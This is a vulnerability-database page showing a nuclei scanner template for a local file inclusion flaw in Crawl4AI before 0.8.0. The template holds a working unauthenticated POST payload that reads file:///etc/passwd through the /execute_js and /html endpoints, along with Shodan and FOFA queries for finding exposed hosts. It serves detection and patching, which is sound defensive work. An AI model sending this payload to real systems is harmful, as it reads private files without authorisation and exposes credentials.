Lucene search
+L

Crawl4AI < 0.8.0 - Local File Inclusion

🗓️ 18 Aug 2026 05:43:38Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 4 Views

Unauthenticated LFI in Crawl4AI < 0.8.0 via file:// URL schemes exposes sensitive files.

Related
Refs
Code
id: CVE-2026-26217

info:
  name: Crawl4AI < 0.8.0 - Local File Inclusion
  author: str4k3r
  severity: critical
  description: |
    The Crawl4AI Docker API endpoints accepted arbitrary URL schemes without an allow-list. An unauthenticated request with a file:// URL could read local files. Fixed in 0.8.0, which restricts accepted URL schemes.
  impact: |
    Unauthenticated remote attackers can read sensitive files, exposing credentials, API keys, and internal application details.
  remediation: |
    Update to version 0.8.0 or later.
  reference:
    - https://github.com/unclecode/crawl4ai/security/advisories/GHSA-vx9w-5cx4-9796
  classification:
    cve-id: CVE-2026-26217
  metadata:
    verified: true
    shodan-query: title:"Crawl4AI"
    fofa-query: title="Crawl4AI"
  tags: cve,cve2026,crawl4ai,lfi,file-read

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    redirects: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(tolower(body), "crawl4ai")'
        internal: true

  - method: POST
    path:
      - "{{BaseURL}}/execute_js"
      - "{{BaseURL}}/html"
    headers:
      Content-Type: application/json
    body: '{"url": "file:///etc/passwd", "scripts": ["document.body.innerText"]}'

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022061a597beed358f09ea08ed64fd017696673f58e046d2cf1b25236e0ce1a9ff91022100daf3fb6ee2a739382ba171ddd009ff89e9255b719d0b190b0ac127392448fe03:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Aug 2026 23:48Current
5.3Medium risk
Vulners AI Score5.3
CVSS 3.17.5 - 8.6
CVSS 49.2
EPSS0.00609
SSVC
4